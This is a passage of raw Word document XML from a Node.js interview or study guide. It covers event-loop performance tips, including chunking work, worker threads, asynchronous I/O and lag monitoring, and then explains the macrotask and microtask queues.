          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Break long tasks into smaller chunks and use setImmediate or process.nextTick to yield control back to the event loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9013D8"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longRunningTask() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E55F605"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Break task into smaller chunks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CC12A2"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for (let i = 0; i &lt; 100000; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F38B26"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(i % 1000 === 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2DF06B"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Yield control back to event loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D1AE2"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setImmediate(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ACF3B1"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console.log(`Processed ${i}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0DB1DB"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A6CFACB"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1DE2E96"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3AE1F75"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9F9CC27" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F19EFB9"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longRunningTask();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210E7A47"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rPr>
        <w:t>4. Optimize CPU-Intensive Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4375C930" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="245"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Problem</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: CPU-intensive tasks can block the event loop and degrade performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B416A6" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="245"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Offload heavy computations to worker threads or use external processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5544A639"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 Worker } = require('worker_threads');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A9AC07" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193961C9"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runWorker() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49691C4F"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new Promise((resolve, reject) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606FD6B1"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worker = new Worker('./worker.js');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C35E4"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worker.on('message', resolve);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FC53C1"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worker.on('error', reject);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5925EA7A"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worker.on('exit', (code) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA14295"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(code !== 0) reject(new Error(`Worker stopped with exit code ${code}`));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B841610"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54F25AE"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8652AB9"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C24E2FB" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E24A6FA"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runWorker().then(result =&gt; console.log(result)).catch(err =&gt; console.error(err));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F269EF6" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In worker.js:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5E9DB5"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Simulate a CPU-intensive task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D53325"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sum = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1217FF2A"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for (let i = 0; i &lt; 1e7; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA4B73D"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sum += i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731675D9"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FB40C1B"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parentPort.postMessage(sum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79412E76"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rPr>
        <w:t>5. Avoid Blocking I/O Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A07015" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Problem</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Blocking I/O operations can stall the event loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F8C25A" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use asynchronous I/O operations (e.g., non-blocking file reads/writes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70255C0A"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6448D8A7" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AC6398"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Non-blocking I/O operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4575B1C2"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fs.writeFile('output.txt', 'Hello, World!', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F313CC3"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2EF4E426"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has been saved!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E16172"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8640B82" w14:textId="77777777"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rPr>
        <w:t>6. Monitor Event Loop Lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311A63CD" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Problem</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Event loop lag can indicate performance issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7386C3" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use tools and techniques to monitor and diagnose event loop performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6482C344"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EventLoopLag = require('event-loop-lag');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0789FE78"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EventLoopLag((lag) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F3F13F" w14:textId="77777777" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322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console.log(`Event loop lag: ${lag} ms`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507AEBCE" w14:textId="4E0AD4C5" w:rsidR="00CF322E" w:rsidRPr="00DA2F32" w:rsidRDefault="00CF322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E329CE8" w14:textId="77777777" w:rsidR="00665E4E" w:rsidRPr="00DA2F32" w:rsidRDefault="00665E4E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5156DB3D" w14:textId="56BA5C8D" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc178383269"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are micro and macro task queues?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="6FD0807F" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Macrotask Queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDE8DA9"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Macrotasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) are units of work that are executed in a specific order. They include tasks such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ED5A3E" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>I/O operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Read/write operations, network requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CABF229" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Timers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: setTimeout, setInterval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B75EFA0" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UI rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: In browsers, tasks related to rendering and updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0676BA13" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User interactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Events like clicks and keypresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CD226D"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The macrotask queue processes tasks one at a time. After executing a macrotask, the event loop checks the microtask queue before moving on to the next macrotask.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAE79ED" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microtask Queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23885A22"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microtasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>next-tick tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) are smaller, high-priority tasks that are typically used for operations that need to happen immediately after the current script has executed but before the event loop continues. They include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F68672" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Promises</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The callbacks registered with .then(), .catch(), and .finally().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9090D1" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mutation Observers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: DOM mutation observers in browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61106DC0" w14:textId="77777777" w:rsidR="009D461B" w:rsidRPr="00DA2F32" w:rsidRDefault="009D461B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>process.nextTick()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: In Node.js, tasks scheduled with process.nextTick().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4F580F"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
